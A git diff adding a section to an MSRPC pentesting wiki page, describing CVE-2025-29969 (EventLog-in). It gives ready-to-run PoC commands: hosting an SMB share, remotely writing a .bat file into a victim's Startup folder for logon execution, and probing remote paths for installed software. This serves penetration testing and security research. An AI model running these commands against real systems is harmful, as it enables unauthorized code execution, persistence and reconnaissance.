diff --git a/src/network-services-pentesting/135-pentesting-msrpc.md b/src/network-services-pentesting/135-pentesting-msrpc.md index e754f591f4a..c297e91c982 100644 --- a/src/network-services-pentesting/135-pentesting-msrpc.md +++ b/src/network-services-pentesting/135-pentesting-msrpc.md @@ -69,6 +69,36 @@ All options except `tcp_dcerpc_auditor` are specifically designed for targeting - **Named Pipe**: `\pipe\epmapper` - **Description**: DCOM interface, used for brute-force password grinding and information gathering via WM. + +### MS-EVEN (EventLog Remoting) primitives + +The **MS-EVEN** RPC interface (named pipe `\pipe\even`) exposes Eventlog operations. SafeBreach’s **CVE-2025-29969 (EventLog-in)** analysis shows a **TOCTOU** flaw in MS-EVEN that lets an **authenticated low-privileged** user trigger a **remote arbitrary file write** on the target: attacker-chosen content written to an attacker-chosen path without needing Administrator rights for the remote write. + +Operational pattern (PoC workflow): stage a **valid EVTX** plus your payload on an SMB share, then race the MS-EVEN logic so the target fetches the SMB-hosted file and writes it to the chosen path. + +```bash +impacket-smbserver -smb2support Share /tmp/safebreach +``` + +The published PoC uses a **hard-coded SMB share name** (`Share`), so if you change it you must also update the script. + +```bash +python write_file_remotely.py 192.168.56.102 192.168.56.105 lowuser Test123 "/tmp/safebreach/Sample.evtx" "calc.bat" "C:\Users\lowuser\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\target.bat" +``` + +A common chain is to drop into a **per-user Startup folder** for persistence and execution on the next logon (execution occurs in that user context). + +#### MS-EVEN CreateFile-style primitive for recon + +MS-EVEN also exposes a **file open/create** primitive (described in the PoC as `CreateFile`) that can be used by any authenticated user to **probe whether a remote file or directory exists**. This is useful for software discovery by checking common install paths (e.g., `C:\Program Files\`): + +```bash +python check_if_exists.py 192.168.56.57 lowuser Password1! "C:\Program Files\Wireshark" + +Result: +FILE_EXISTS_AND_IS_DIRECTORY +``` + ### Identifying IP addresses Using [https://github.com/mubix/IOXIDResolver](https://github.com/mubix/IOXIDResolver), comes from [Airbus research](https://www.cyber.airbus.com/the-oxid-resolver-part-1-remote-enumeration-of-network-interfaces-without-any-authentication/) is possible to abuse the _**ServerAlive2**_ method inside the _**IOXIDResolver**_ interface. @@ -226,6 +256,8 @@ A single out-of-bounds write or unexpected exception will be surfaced immediatel ## References +- [EventLogin-CVE-2025-29969 (SafeBreach-Labs)](https://github.com/SafeBreach-Labs/EventLogin-CVE-2025-29969) +- [EventLog-in: Propagating With Weak Credentials Using the Eventlog Service in Microsoft Windows](https://www.safebreach.com/blog/safebreach_labs_discovers_cve-2025-29969/) - [Automating MS-RPC vulnerability research (2025, Incendium.rocks)](https://www.incendium.rocks/posts/Automating-MS-RPC-Vulnerability-Research/) - [MS-RPC-Fuzzer – context-aware RPC fuzzer](https://github.com/warpnet/MS-RPC-Fuzzer) - [NtObjectManager PowerShell module](https://github.com/googleprojectzero/sandbox-attacksurface-analysis-tools/tree/master/NtObjectManager)